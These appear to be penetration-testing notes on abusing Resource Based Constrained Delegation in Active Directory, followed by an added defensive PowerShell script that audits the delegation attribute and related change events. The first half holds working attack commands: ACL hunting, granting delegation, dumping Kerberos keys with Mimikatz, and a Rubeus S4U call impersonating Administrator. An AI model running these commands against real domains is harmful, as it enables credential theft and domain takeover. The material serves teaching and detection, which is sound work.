- Resource Based Constrained Delegation
- This moves delegation authority to the resource/service administrator.
- Instead of SPNs in msDS-AllowedToDelegateTo on the front-end service (like the web service in this example), access in this case is controlled by the security descriptor of msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service.
- That is, the resource/service administrator can configure this delegation, whereas for the other delegation types the SeEnableDelegation privilege is required, which by default is available only to Domain Admins.
- The security descriptor on the second hop determines who can access it, not the first hop.
To abuse RBCD in the most effective form, we just need two privileges:
- Write permissions over the target service or object to configure msDS-AllowedToActOnBehalfOfOtherIdentity
- Control over an object which has an SPN configured (like admin access to a domain-joined machine, or the ability to join a machine to the domain: ms-DS-MachineAccountQuota is 10 for all domain users by default)
```powershell
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'username'}
Get-DomainRBCD
Set-DomainRBCD -Identity computer-name -DelegateFrom your-foothold
$machine_accounts = 'pwned-machine-account1$', 'pwned-machine-account2$'
Set-ADComputer -Identity computer-name -PrincipalsAllowedToDelegateToAccount $machine_accounts
Invoke-MimiKatz -Command '"sekurlsa::ekeys"'
Rubeus.exe s4u /user:machine-account1$ /aes256:<aes256_key> /msdsspn:service/computer-name /impersonateuser:Administrator /ptt
```
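For the defender's view of the same attribute (the security descriptor on the resource described above), here is an added PowerShell audit script that is not part of the original notes or of any tool they mention: it lists every computer object whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated, decodes the binary descriptor to show which principals may delegate to it, and pulls recent directory-change events (5136) that touched that attribute. Assumptions: the ActiveDirectory RSAT module is installed, the function names and the 7-day window are mine, and 5136 collection only works when "Audit Directory Service Changes" is enabled and the computer objects carry a SACL; run it from a management host or a domain controller.

```powershell
# Added audit example (not from the original notes).
# Requires the ActiveDirectory RSAT module and read access to the attribute.
Import-Module ActiveDirectory

function Get-RbcdConfiguredComputers {
    [CmdletBinding()]
    param(
        # Assumed default: search the whole domain; narrow the base for large forests.
        [string]$SearchBase = (Get-ADDomain).DistinguishedName
    )

    # LDAP presence filter: only objects where the RBCD attribute is set at all.
    $computers = Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -SearchBase $SearchBase `
        -Properties msDS-AllowedToActOnBehalfOfOtherIdentity, PrincipalsAllowedToDelegateToAccount, whenChanged

    foreach ($c in $computers) {
        # The attribute is a binary security descriptor; decode it to read the ACEs directly
        # instead of trusting only the friendly PrincipalsAllowedToDelegateToAccount view.
        $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $sd.SetSecurityDescriptorBinaryForm($c.'msDS-AllowedToActOnBehalfOfOtherIdentity')

        # Pull the ACEs as raw SIDs so an orphaned SID (deleted account) does not abort the loop.
        $rules = $sd.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        $principals = foreach ($ace in $rules) {
            $sid = $ace.IdentityReference
            try   { $sid.Translate([System.Security.Principal.NTAccount]).Value }
            catch { "$($sid.Value) (unresolved)" }   # stale SID: worth a closer look
        }

        [pscustomobject]@{
            Computer          = $c.Name
            DistinguishedName = $c.DistinguishedName
            AllowedToDelegate = ($principals -join '; ')
            ResolvedDNs       = ($c.PrincipalsAllowedToDelegateToAccount -join '; ')
            LastChanged       = $c.whenChanged
        }
    }
}

function Get-RbcdChangeEvents {
    [CmdletBinding()]
    param([int]$Days = 7)   # assumed window

    # 5136 = "A directory service object was modified"; the message names the LDAP attribute
    # that changed. Needs directory service change auditing and a SACL on the objects.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5136; StartTime = (Get-Date).AddDays(-$Days) } `
        -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'msDS-AllowedToActOnBehalfOfOtherIdentity' } |
        Select-Object TimeCreated, Id, @{ Name = 'Summary'; Expression = { ($_.Message -split "`n")[0] } }
}

# Usage: review the current state, then check who changed it recently.
Get-RbcdConfiguredComputers | Format-Table -AutoSize
Get-RbcdChangeEvents -Days 7 | Format-Table -AutoSize
```

Every row from Get-RbcdConfiguredComputers should map to a known, documented front-end service; an unexpected machine account (especially a recently created one, given the default ms-DS-MachineAccountQuota) or an unresolved SID in AllowedToDelegate is the finding to chase, and the 5136 events tell you which account wrote the attribute and when.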